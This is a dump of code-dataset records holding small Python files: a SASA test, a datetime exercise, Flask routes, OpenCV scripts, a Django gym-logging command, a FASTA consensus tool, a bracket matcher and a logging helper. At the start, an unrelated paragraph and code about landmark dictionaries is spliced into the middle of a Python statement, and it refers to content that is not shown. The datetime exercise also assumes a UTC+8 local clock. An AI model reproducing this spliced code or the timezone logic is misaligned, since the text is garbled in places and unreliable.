sorted(glob.glob(\"tests_dataset/pdb/rcsb/*.pdb\")):\n frame = PdbFile(filename).get_frame()\n ats = frame.asAtoms\n radii = 
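The landmark_dict / landmark3d_dict literals above are fully regular: the same fourteen point names crossed with _x/_y (or _x/_y/_z) suffixes, keyed by stringified position. They could be generated instead of hand-written; a sketch using the names from the dicts above:

    POINTS = [
        'left_eye_outer_corner', 'left_eye_inner_corner',
        'right_eye_inner_corner', 'right_eye_outer_corner',
        'left_nose_top', 'left_nose_bottom',
        'right_nose_top', 'right_nose_bottom', 'nose_root',
        'mouth_center_top_lip', 'mouth_left_corner',
        'mouth_center_bottom_lip', 'mouth_right_corner', 'mouth_center_lip',
    ]

    def make_landmark_dict(suffixes=('_x', '_y')):
        # {'0': 'left_eye_outer_corner_x', '1': 'left_eye_outer_corner_y', ...}
        names = [p + s for p in POINTS for s in suffixes]
        return {str(i): n for i, n in enumerate(names)}

    landmark_dict = make_landmark_dict()                      # 28 entries
    landmark3d_dict = make_landmark_dict(('_x', '_y', '_z'))  # 42 entries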
np.array([1.0] * ats.size)\n coords = ats.toCoords\n\n t1 = timer()\n assert calc_sasa(coords, radii, 0.0, np.array([0], dtype=np.intc)).size == 1\n t2 = timer()\n assert calc_sasa(coords, radii, 0.0, np.array([0, 1, 2, 3, 4], dtype=np.intc)).size == 5\n t3 = timer()\n assert calc_sasa(coords, radii, 0.0).size == radii.size\n t4 = timer()\n assert calc_sasa(coords, radii, 0.0, n_samples=1).size == radii.size\n\n T1, T3 = t2 - t1, t4 - t3\n assert T3 > T1\n\n","sub_path":"pytests/xmol/pdb/test_sasa.py","file_name":"test_sasa.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583524749","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2018-06-07 16:36:51\r\n# @Author : Chen Cjv (cjvaely@foxmail.com)\r\n# @Link : https://github.com/Cjvaely\r\n# @Version : $Id$\r\n\r\n# datetime:处理日期和时间的标准库\r\n\r\n# datetime.now()返回当前日期和时间,其类型是datetime\r\n\r\n# timestamp:当前时间就是相对于epoch time(1970年1月1日 00:00:00 UTC+00:00时区的时刻)的秒数\r\n# timestamp = 0 = 1970-1-1 00:00:00 UTC+0:00\r\n\r\n# datetime转换为timestamp:dt.timestamp()\r\n# timestamp转换为datetime:datetime.fromtimestamp(t)\r\n\r\n# str转换为datetime:datetime.strptime('timestr','format')\r\n# datetime转换为str:now.strftime()\r\n\r\n# 练习:假设你获取了用户输入的日期和时间如2015-1-21 9:01:30,\r\n# 以及一个时区信息如UTC+5:00,均是str,请编写一个函数将其转换为timestamp:\r\nimport re\r\nfrom datetime import datetime, timezone, timedelta\r\n\r\n\r\ndef to_timestamp(dt_str, tz_str):\r\n st = datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S')\r\n ts = st.timestamp()\r\n ls = re.match(r'UTC(\\+|\\-)([0-9]?[0-9]+):(00)$', tz_str)\r\n if ls:\r\n if ls.group(1) == '+':\r\n stamp = ts + (8 - int(ls.group(2))) * 3600\r\n else:\r\n stamp = ts + (8 + int(ls.group(2))) * 3600\r\n return stamp\r\n\r\n# 测试:\r\n\r\n\r\nt1 = to_timestamp('2015-6-1 08:10:30', 'UTC+7:00')\r\nassert t1 == 1433121030.0, t1\r\n\r\nt2 = to_timestamp('2015-5-31 16:10:30', 'UTC-09:00')\r\nassert t2 == 1433121030.0, t2\r\n\r\nprint('ok')\r\n","sub_path":"LiaoPython/Datetime.py","file_name":"Datetime.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114495116","text":"from flask import render_template\nfrom flask_login import login_required\n\nfrom app import app\n\n\n@app.route('/admin/otcheti/dopolnitelno')\n@login_required\ndef otcheti_kolichstovo_torgovih_tochek():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/kolichstovo_torgovih_tochek.html', context=context)\n\n\n@app.route('/admin/otcheti/okazanie_uslug')\n@login_required\ndef otcheti_okazanie_uslug():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/okazanie_uslug.html', context=context)\n\n\n@app.route('/admin/otcheti/periodizatsia_prodaj')\n@login_required\ndef otcheti_periodizatsia_prodaj():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/periodizatsia_prodaj.html', context=context)\n\n\n@app.route('/admin/otcheti/shahmatka_po_pokupateliam')\n@login_required\ndef otcheti_shahmatka_po_pokupateliam():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/shahmatka_po_pokupateliam.html', context=context)\n\n\n@app.route('/admin/otcheti/shahmatke_po_postavshikam')\n@login_required\ndef 
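The to_timestamp() exercise above gets the right answer by correcting against the author's own UTC+8 machine clock (the 8 - offset arithmetic), so it silently depends on the local timezone. A machine-independent sketch attaches the parsed offset as a tzinfo instead (same inputs, same expected timestamps):

    import re
    from datetime import datetime, timedelta, timezone

    def to_timestamp_tz(dt_str, tz_str):
        # Assumes tz_str matches UTC±H:MM, as in the asserts above.
        m = re.match(r'UTC([+-])(\d{1,2}):(\d{2})$', tz_str)
        sign = 1 if m.group(1) == '+' else -1
        tz = timezone(sign * timedelta(hours=int(m.group(2)),
                                       minutes=int(m.group(3))))
        dt = datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S').replace(tzinfo=tz)
        return dt.timestamp()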
otcheti_shahmatke_po_postavshikam():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/shahmatke_po_postavshikam.html', context=context)\n\n@app.route('/admin/otcheti/spisok_otchetov')\n@login_required\ndef otcheti_spisok_otchetov():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/spisok_otchetov.html', context=context)\n\n\n\n","sub_path":"app/routes/Otcheti/OtchetiRoutes.py","file_name":"OtchetiRoutes.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124013743","text":"import os\n\nimport cv2\n\nimg = cv2.imread(os.path.dirname(os.path.abspath(\".\")) + \"\\imgs\" + \"\\lfigury.png\", 0)\nborder = 116\nret, img_bin = cv2.threshold(img, border, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\ncv2.imshow(\"Img\", img)\ncv2.imshow(\"Binary\", img_bin)\nfor i in [2, 5, 7, 20]:\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2 * i + 1, 2 * i + 1))\n img_open = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n cv2.imshow(\"Open r = \" + str(i), img_open)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"cw08/cw07.py","file_name":"cw07.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594403201","text":"import requests\n\nfrom collections import Counter\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom gyms.models import GymLog\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n url = 'http://lincroad.com/raw_data?pokemon=false&pokestops=false&luredonly=false&gyms=true&scanned=false&spawnpoints=false' # NOQA\n data = requests.get(url)\n gyms = data.json()['gyms']\n teams = [gyms[key]['team_id'] for key in gyms]\n\n counter = dict(Counter(teams))\n \n GymLog.objects.create(\n created=timezone.now(),\n mystic=counter[1],\n valor=counter[2],\n instinct=counter[3],\n )\n","sub_path":"gyms/management/commands/create_gym_log.py","file_name":"create_gym_log.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"612147608","text":"#Written by Nathan on 2/17/14. Counts up total numbers for contingency tables\r\ndef count_contingency():\r\n #import packages, estalish paths\r\n import os\r\n import json\r\n origin = os.path.join('\\Python33','sdsc_rehs_2013')\r\n d_path = os.path.join(origin,'dictionaries')\r\n bpn = json.load(open(os.path.join(d_path,'bacteria_bound_long_posneg.json')))\r\n vpn = json.load(open(os.path.join(d_path,'viruses_bound_long_posneg.json')))\r\n #initialize numbers\r\n bposorder = 0\r\n bposdisorder = 0\r\n bnegorder = 0\r\n bnegdisorder = 0\r\n vposorder = 0\r\n vposdisorder = 0\r\n vnegorder = 0\r\n vnegdisorder = 0\r\n #run through bacteria entries. 
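In create_gym_log above, dict(Counter(teams)) throws away Counter's zero default, so counter[1] / counter[2] / counter[3] raise KeyError as soon as one team holds no gyms and the whole command fails. A tolerant sketch:

    from collections import Counter

    def team_counts(gyms):
        # .get() with a default (or keeping the Counter itself, which
        # returns 0 for missing keys) survives a team owning zero gyms.
        counter = Counter(g['team_id'] for g in gyms.values())
        return {team: counter.get(team, 0) for team in (1, 2, 3)}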
For number correspondence check posneg_disorder.py\r\n    for ep_id in bpn:\r\n        for entry in range(len(bpn[ep_id])):\r\n            #check if disordered and 1 or 3 (contains positive residue)\r\n            if (bpn[ep_id][entry][0] >= .5) and (bpn[ep_id][entry][1] in (1, 3)):\r\n                bposdisorder += 1\r\n            #check if ordered and 1 or 3\r\n            elif (bpn[ep_id][entry][0] < .5) and (bpn[ep_id][entry][1] in (1, 3)):\r\n                bposorder += 1\r\n            #check if disordered and 2 (only negative residue)\r\n            elif (bpn[ep_id][entry][0] >= .5) and (bpn[ep_id][entry][1] == 2):\r\n                bnegdisorder += 1\r\n            #check if ordered and 2\r\n            elif (bpn[ep_id][entry][0] < .5) and (bpn[ep_id][entry][1] == 2):\r\n                bnegorder += 1\r\n    #same as above but for viruses\r\n    for ep_id in vpn:\r\n        for entry in range(len(vpn[ep_id])):\r\n            if (vpn[ep_id][entry][0] >= .5) and (vpn[ep_id][entry][1] in (1, 3)):\r\n                vposdisorder += 1\r\n            elif (vpn[ep_id][entry][0] < .5) and (vpn[ep_id][entry][1] in (1, 3)):\r\n                vposorder += 1\r\n            elif (vpn[ep_id][entry][0] >= .5) and (vpn[ep_id][entry][1] == 2):\r\n                vnegdisorder += 1\r\n            elif (vpn[ep_id][entry][0] < .5) and (vpn[ep_id][entry][1] == 2):\r\n                vnegorder += 1\r\n    print (\"bposorder = \" + str(bposorder))\r\n    print (\"bposdisorder = \" + str(bposdisorder))\r\n    print (\"bnegorder = \" + str(bnegorder))\r\n    print (\"bnegdisorder = \" + str(bnegdisorder))\r\n    print (\"vposorder = \" + str(vposorder))\r\n    print (\"vposdisorder = \" + str(vposdisorder))\r\n    print (\"vnegorder = \" + str(vnegorder))\r\n    print (\"vnegdisorder = \" + str(vnegdisorder))\r\n    \r\n","sub_path":"24count_contingency.py","file_name":"24count_contingency.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439864768","text":"import cv2,time\n\nface_cascade=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nvideo=cv2.VideoCapture(0)\na=1\nwhile True:\n    a=a+1\n    check,frame=video.read()\n    print(frame)\n    \n    grey=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n    # search coordinate of image\n    faces=face_cascade.detectMultiScale(grey,scaleFactor= 1.05, minNeighbors=5)\n    \n    print(type(faces))\n    print(faces)\n    \n    for x,y,w,h in faces:\n        frame=cv2.rectangle(frame, (x,y), (x+w,y+h), (0,255,0),3)\n    \n    \n    cv2.imshow('capturing',frame)\n    cv2.imshow('grey',grey)\n    \n    key=cv2.waitKey(1)\n    if key==ord('q'):\n        break\n\nprint(a) #print number of frame\nvideo.release()\ncv2.destroyAllWindows()\n","sub_path":"fd.py","file_name":"fd.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"95041429","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport argparse\nimport os\nimport sys\n\nfrom Bio import AlignIO\nfrom Bio.Alphabet import IUPAC\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n\ndef consensus(aln, any_n=False, any_gap=False):\n    # pre-compute dictionaries on first run\n    if \"collapse_iupac\" not in consensus.__dict__:\n        # sorted tuples map to iupac codes\n        consensus.collapse_iupac = {\n            ('-',): '-',\n            ('a',): 'a',\n            ('g',): 'g',\n            ('c',): 'c',\n            ('t',): 't',\n            ('c', 't'): 'y',\n            ('a', 'g'): 'r',\n            ('a', 't'): 'w',\n            ('c', 'g'): 's',\n            ('g', 't'): 'k',\n            ('a', 'c'): 'm',\n            ('a', 'g', 't'): 'd',\n            ('a', 'c', 'g'): 'v',\n            ('a', 'c', 't'): 'h',\n            ('c', 'g', 't'): 'b',\n            ('a', 'c', 'g', 't'): 'n',\n        }\n\n        # inverse process of collapse_iupac, but n's in input are treated special, so don't expand them\n        consensus.expand_iupac = {value: set(key) for key, value in 
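fd.py above unpacks check, frame = video.read() but never inspects check; when the camera delivers no frame, frame is None and cv2.cvtColor raises. A guarded capture loop sketch:

    import cv2

    video = cv2.VideoCapture(0)
    while True:
        ok, frame = video.read()
        if not ok:
            break  # camera unavailable or stream ended
        grey = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        cv2.imshow('grey', grey)
        if cv2.waitKey(1) == ord('q'):
            break
    video.release()
    cv2.destroyAllWindows()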
consensus.collapse_iupac.items() if value != 'n'}\n consensus.expand_iupac['n'] = {'n'}\n\n con = \"\"\n for loc in range(aln.get_alignment_length()):\n # expand iupac code to base set\n base_set = set.union(*[consensus.expand_iupac[seq[loc].lower()] for seq in aln])\n\n # with any_gap, any '-' in input will result in '-' in output\n if any_gap and '-' in base_set:\n con += '-'\n continue\n # without any_gap, if vertical '-', return '-'\n elif not any_gap and base_set == {'-'}:\n con += '-'\n continue\n # if not vertical '-', ignore '-'\n elif '-' in base_set:\n base_set.remove('-')\n\n # with any_n, any 'n' in input will result in 'n' in output\n if any_n and 'n' in base_set:\n con += 'n'\n continue\n # without any_n, if vertical 'n', return 'n'\n elif not any_n and base_set == {'n'}:\n con += 'n'\n continue\n # if not vertical 'n', ignore 'n'\n elif 'n' in base_set:\n base_set.remove('n')\n\n # collapse base_set to iupac code\n con += consensus.collapse_iupac[tuple(sorted(base_set))]\n\n return con\n\n\nclass HelpAndQuitOnFailParser(argparse.ArgumentParser):\n \"\"\"custom argparse configuration\n if error parsing, prints help and exits\"\"\"\n\n def error(self, message):\n sys.stderr.write('error: {}\\n'.format(message))\n self.print_help()\n sys.exit(2)\n\n\ndef main():\n parser = HelpAndQuitOnFailParser()\n\n # files/directories\n parser.add_argument('-i', '--input', default=\"alignment.fasta\",\n help='path to input file, or input directory if using batch mode')\n\n parser.add_argument('-o', '--out_file', default=\"consensus.fasta\",\n help='path to output file')\n\n parser.add_argument('--batch_mode', action='store_true',\n help='take an input directory instead of input file')\n\n parser.add_argument('--any_n', action='store_true',\n help=(\"By default, if *all* bases at a location are 'n', the consensus will be a 'n'. \"\n \"This flag changes that rule to return an 'n' if *any* 'n' are found at that loc.\"))\n\n parser.add_argument('--any_gap', action='store_true',\n help=(\"Same as --any_n above. 
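A quick worked example of the collapse rules in consensus() above, assuming the function is importable and a Bio.Alphabet-era Biopython matching the imports above: a column containing c and t collapses to the IUPAC code y.

    from Bio.Align import MultipleSeqAlignment
    from Bio.Seq import Seq
    from Bio.SeqRecord import SeqRecord

    aln = MultipleSeqAlignment([
        SeqRecord(Seq("acgt"), id="s1"),
        SeqRecord(Seq("atgt"), id="s2"),
    ])
    print(consensus(aln))  # "aygt": column 1 is {c, t}, which maps to 'y'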
\"\n \"If --any_gap and --any_n are set, gaps take precedence\"))\n\n args = parser.parse_args()\n\n with open(args.out_file, \"wt\") as f:\n # batch mode\n if args.batch_mode:\n for filename in os.listdir(args.input):\n\n sample_name, extension = os.path.splitext(filename)\n if extension not in {\".fasta\", \".fna\"}:\n continue\n\n in_aln = AlignIO.read(os.path.join(args.input, filename), \"fasta\")\n\n con_str = consensus(in_aln, any_n=args.any_n, any_gap=args.any_gap)\n con_seq = Seq(con_str, alphabet=IUPAC.ambiguous_dna)\n con_rec = SeqRecord(con_seq, id=sample_name, name=sample_name, description=\"\")\n\n f.write(con_rec.format(\"fasta\"))\n\n # single file mode\n else:\n sample_name, _ = os.path.splitext(args.input)\n\n in_aln = AlignIO.read(args.input, \"fasta\")\n\n con_str = consensus(in_aln, any_n=args.any_n, any_gap=args.any_gap)\n con_seq = Seq(con_str, alphabet=IUPAC.ambiguous_dna)\n con_rec = SeqRecord(con_seq, id=sample_name, name=sample_name, description=\"\")\n\n f.write(con_rec.format(\"fasta\"))\n\n\nif __name__ == \"__main__\":\n # run main\n sys.exit(main())\n","sub_path":"consensus.py","file_name":"consensus.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"338707115","text":"def match(s):\n stack = []\n for i in range(len(s)):\n if s[i] == '(' or s[i] == '[' or s[i] == '{':\n stack.append(s[i])\n elif len(stack) == 0 and (s[i] == ')' or s[i] == ']' or s[i] == '}'):\n return \"not balanced\"\n elif s[i] == ')' and stack[len(stack)-1] == '(':\n stack.pop(len(stack)-1)\n elif s[i] == ']' and stack[len(stack)-1] == '[':\n stack.pop(len(stack)-1)\n elif s[i] == '}' and stack[len(stack)-1] == '{':\n stack.pop(len(stack)-1)\n else:\n return \"not balanced\"\n\n if len(stack) != 0:\n return \"not balanced\"\n else:\n return \"balanced\"\n\n\nn = int(input())\nstring = []\n\nfor i in range(n):\n string.append(input())\n\nfor i in range(n):\n print(match(string[i]))\n\n","sub_path":"Code/CodeRecords/2471/60691/288014.py","file_name":"288014.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"307730493","text":"'''\nCopyright 2020 Sensetime X-lab. All Rights Reserved\n\nMain Function:\n 1. log helper, used to help to save logger on terminal, tensorboard or save file.\n 2. CountVar, to help counting number.\n'''\nimport json\nimport logging\nimport numbers\nimport os\nimport sys\n\nimport cv2\nimport numpy as np\nimport yaml\nfrom tabulate import tabulate\nfrom tensorboardX import SummaryWriter\nimport torch\n\ndef build_logger(cfg, name=None, rank=0):\n r'''\n Overview:\n use config to build checkpoint helper. 
Only rank == 0 can build.\n Arguments:\n - name (:obj:`str`): the logger file name\n - rank (:obj:`int`): only rank == 0 can build, else return TextLogger that only save terminal output\n Returns:\n - logger (:obj:`TextLogger`): logger that save terminal output\n - tb_logger (:obj:`TensorBoardLogger` or :obj:`None`): logger that save output to tensorboard,\n if rank != 0 then None\n - variable_record (:obj:`VariableRecord` or :obj:`None`): logger that record variable for further process,\n if rank != 0 then None\n '''\n path = cfg.common.save_path\n # Note: Only support rank0 tb_logger, variable_record\n if rank == 0:\n logger = TextLogger(path, name=name)\n tb_logger = TensorBoardLogger(path, name=name)\n var_record_type = cfg.learner.get(\"var_record_type\", None)\n if var_record_type is None:\n variable_record = VariableRecord(cfg.learner.log_freq)\n else:\n raise NotImplementedError(\"not support var_record_type: {}\".format(var_record_type))\n return logger, tb_logger, variable_record\n else:\n logger = TextLogger(path, name=name)\n return logger, None, None\n\n\ndef build_logger_naive(path, name, level=logging.INFO, print_freq=1):\n r'''\n Overview:\n use config to build Textlogger and VariableRecord\n Arguments:\n - path (:obj:`str`): logger's save dir, please reference log_helper.TextLogger\n - name (:obj:`str`): the logger file name\n - level (:obj:`int` or :obj:`str`): Set the logging level of logger\n - rank (:obj:`int`): only rank == 0 can build, else return TextLogger that only save terminal output\n Returns:\n - logger (:obj:`TextLogger`): logger that save terminal output\n - variable_record (:obj:`VariableRecord`): logger that record variable for further process\n '''\n logger = TextLogger(path, name, level)\n variable_record = VariableRecord(print_freq)\n return logger, variable_record\n\n\ndef get_default_logger(name=None):\n r\"\"\"\n Overview:\n get the logger using logging.getLogger\n\n Arguments:\n - name (:obj:`str`): the name of logger, if None then get 'default_logger'\n\n Notes:\n you can reference Logger.manager.getLogger(name) in the python3 /logging/__init__.py\n \"\"\"\n if name is None:\n name = 'default_logger'\n return logging.getLogger(name)\n\n\nclass TextLogger(object):\n r\"\"\"\n Overview:\n Logger that save terminal output to file\n\n Interface: __init__, info\n \"\"\"\n\n def __init__(self, path, name=None, level=logging.INFO):\n r\"\"\"\n Overview:\n initialization method, create logger.\n Arguments:\n - path (:obj:`str`): logger's save dir\n - name (:obj:`str`): logger's name\n - level (:obj:`int` or :obj:`str`): Set the logging level of logger, reference Logger class setLevel method.\n \"\"\"\n if name is None:\n name = 'default_logger'\n # ensure the path exists\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n self.logger = self._create_logger(name, os.path.join(path, name + '.txt'), level=level)\n\n def _create_logger(self, name, path, level=logging.INFO):\n r\"\"\"\n Overview:\n create logger using logging\n Arguments:\n - name (:obj:`str`): logger's name\n - path (:obj:`str`): logger's save dir\n Returns:\n - (:obj`logger`): new logger\n \"\"\"\n logger = logging.getLogger(name)\n logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\n if not logger.handlers:\n formatter = logging.Formatter('[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\n fh = logging.FileHandler(path, 'a')\n fh.setFormatter(formatter)\n 
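A hypothetical usage sketch for the pair returned by build_logger_naive above: TextLogger appends to <path>/<name>.txt, and VariableRecord (defined further below) smooths scalar values over the given window before printing.

    logger, record = build_logger_naive('./log', 'train', print_freq=20)
    record.register_var('total_loss')
    for loss in (0.9, 0.8, 0.7):
        record.update_var({'total_loss': loss})
    logger.info(record.get_vars_text())  # tabulated val/avg per variable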
logger.setLevel(level)\n logger.addHandler(fh)\n #handler = logging.StreamHandler()\n #handler.setFormatter(formatter)\n #logger.addHandler(handler)\n #logger.propagate = False\n return logger\n\n def info(self, s):\n r\"\"\"\n Overview:\n add message to logger\n Arguments:\n - s (:obj:`str`): message to add to logger\n Notes:\n you can reference Logger class in the python3 /logging/__init__.py\n \"\"\"\n self.logger.info(s)\n\n def bug(self, s):\n r\"\"\"\n Overview:\n call logger.debug\n Arguments:\n - s (:obj:`str`): message to add to logger\n Notes:\n you can reference Logger class in the python3 /logging/__init__.py\n \"\"\"\n self.logger.debug(s)\n\n def error(self, s):\n self.logger.error(s)\n\n\nclass TensorBoardLogger(object):\n r\"\"\"\n Overview:\n logger that save message to tensorboard\n\n Interface:\n __init__, add_scalar, add_text, add_scalars, add_histogram, add_figure, add_image, add_scalar_list,\n register_var, scalar_var_names\n \"\"\"\n\n def __init__(self, path, name=None):\n r\"\"\"\n Overview:\n initialization method, create logger and set var names.\n Arguments:\n - path (:obj:`str`): logger save dir\n - name (:obj:`str`): logger name\n \"\"\"\n if name is None:\n name = 'default_tb_logger'\n self.logger = SummaryWriter(os.path.join(path, name)) # get summary writer\n self._var_names = {\n 'scalar': [],\n 'text': [],\n 'scalars': [],\n 'histogram': [],\n 'figure': [],\n 'image': [],\n }\n\n def add_scalar(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to scalar\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['scalar']\n \"\"\"\n assert (name in self._var_names['scalar'])\n self.logger.add_scalar(name, *args, **kwargs)\n\n def add_text(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to text\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['text']\n \"\"\"\n assert (name in self._var_names['text'])\n self.logger.add_text(name, *args, **kwargs)\n\n def add_scalars(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to scalars\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['scalars']\n \"\"\"\n assert (name in self._var_names['scalars'])\n self.logger.add_scalars(name, *args, **kwargs)\n\n def add_histogram(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to histogram\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['histogram']\n \"\"\"\n assert (name in self._var_names['histogram'])\n self.logger.add_histogram(name, *args, **kwargs)\n\n def add_figure(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to figure\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['figure']\n \"\"\"\n assert (name in self._var_names['figure'])\n self.logger.add_figure(name, *args, **kwargs)\n\n def add_image(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to image\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['image']\n \"\"\"\n assert (name in self._var_names['image'])\n self.logger.add_image(name, *args, **kwargs)\n\n def add_val_list(self, val_list, viz_type):\n r\"\"\"\n Overview:\n add val_list info to tb\n Arguments:\n - val_list (:obj:`list`): include element(name, value, step) to be added\n - viz_type (:obs:`str`): must be in ['scalar', 'scalars', 'histogram']\n \"\"\"\n assert (viz_type in ['scalar', 'scalars', 'histogram'])\n func_dict = {\n 'scalar': self.add_scalar,\n 'scalars': self.add_scalars,\n 'histogram': 
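The asserts in TensorBoardLogger above enforce a register-before-use contract: every tag has to be declared through register_var under the matching var_type before the first write. A hypothetical usage sketch:

    tb = TensorBoardLogger('./log', 'train_tb')
    tb.register_var('total_loss')              # var_type defaults to 'scalar'
    tb.add_scalar('total_loss', 0.73, 100)     # ok: the tag was registered
    tb.add_val_list([('total_loss', 0.71, 101)], 'scalar')
    # tb.add_scalar('unregistered', 1.0, 0) would trip the assert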
self.add_histogram,\n }\n for n, v, s in val_list:\n func_dict[viz_type](n, v, s)\n\n def _no_contain_name(self, name):\n for k, v in self._var_names.items():\n if name in v:\n return False\n return True\n\n def register_var(self, name, var_type='scalar'):\n r\"\"\"\n Overview:\n add var to self_var._names\n\n Arguments:\n - name (:obj:`str`): name to add\n - var_type (:obj:`str`): the type of var to add to, defalut set to 'scalar',\n support [scalar', 'text', 'scalars', 'histogram', 'figure', 'image']\n \"\"\"\n assert (var_type in self._var_names.keys())\n # assert (self._no_contain_name(name))\n self._var_names[var_type].append(name)\n\n @property\n def scalar_var_names(self):\n r\"\"\"\n Overview:\n return scalar_var_names\n Returns:\n - names(:obj:`list` of :obj:`str`): self._var_names['scalar']\n \"\"\"\n return self._var_names['scalar']\n\n\nclass VariableRecord(object):\n r\"\"\"\n Overview:\n logger that record variable for further process\n\n Interface:\n __init__, register_var, update_var, get_var_names, get_var_text, get_vars_tb_format, get_vars_text\n \"\"\"\n\n def __init__(self, length):\n r\"\"\"\n Overview:\n init the VariableRecord\n Arguments:\n - length (:obj:`int`): the length to average across, if less than 10 then will be set to 10\n \"\"\"\n self.var_dict = {'scalar': {}}\n self.length = max(length, 10) # at least average across 10 iteration\n\n def register_var(self, name, length=None, var_type='scalar'):\n r\"\"\"\n Overview:\n add var to self_var._names, calculate it's average value\n Arguments:\n - name (:obj:`str`): name to add\n - length (:obj:`int` or :obj:`None`): length of iters to average, default set to self.length\n - var_type (:obj:`str`): the type of var to add to, defalut set to 'scalar'\n \"\"\"\n assert (var_type in ['scalar'])\n lens = self.length if length is None else length\n self.var_dict[var_type][name] = AverageMeter(lens)\n\n def update_var(self, info):\n r\"\"\"\n Overview:\n update vars\n Arguments:\n - info (:obj:`dict`): key is var type and value is the corresponding variable name\n \"\"\"\n assert isinstance(info, dict)\n for k, v in info.items():\n var_type = self._get_var_type(k)\n self.var_dict[var_type][k].update(v)\n\n def _get_var_type(self, k):\n for var_type, var_type_dict in self.var_dict.items():\n if k in var_type_dict.keys():\n return var_type\n raise KeyError(\"invalid key({}) in variable record\".format(k))\n\n def get_var_names(self, var_type='scalar'):\n r\"\"\"\n Overview:\n get the corresponding variable names of a certain var_type\n Arguments:\n - var_type (:obj:`str`): defalut set to 'scalar', support [scalar']\n Returns:\n - keys (:obj:`list` of :obj:`str`): the var names of a certain var_type\n \"\"\"\n return self.var_dict[var_type].keys()\n\n def get_var_text(self, name, var_type='scalar'):\n r\"\"\"\n Overview:\n get the text discroption of var\n Arguments:\n - name (:obj:`str`): name of the var to query\n - var_type(:obj:`str`): default set to scalar, support ['scalar']\n Returns:\n - text(:obj:`str`): the corresponding text description\n \"\"\"\n assert (var_type in ['scalar'])\n if var_type == 'scalar':\n handle_var = self.var_dict[var_type][name]\n return '{}: val({:.6f})|avg({:.6f})'.format(name, handle_var.val, handle_var.avg)\n else:\n raise NotImplementedError\n\n def get_vars_tb_format(self, keys, cur_step, var_type='scalar', **kwargs):\n r\"\"\"\n Overview:\n get the tb_format description of var\n Arguments:\n - keys (:obj:`list` of :obj:`str`): keys(names) of the var to query\n - cur_step 
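get_vars_tb_format, whose definition continues just below, returns (name, value, step) triples, which is exactly the shape TensorBoardLogger.add_val_list consumes, so the two classes chain directly (sketch, assuming both objects came from build_logger):

    # One logging tick: pull smoothed values out of the record and
    # push them to tensorboard in a single call.
    triples = variable_record.get_vars_tb_format(
        variable_record.get_var_names('scalar'), cur_step=100)
    tb_logger.add_val_list(triples, 'scalar')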
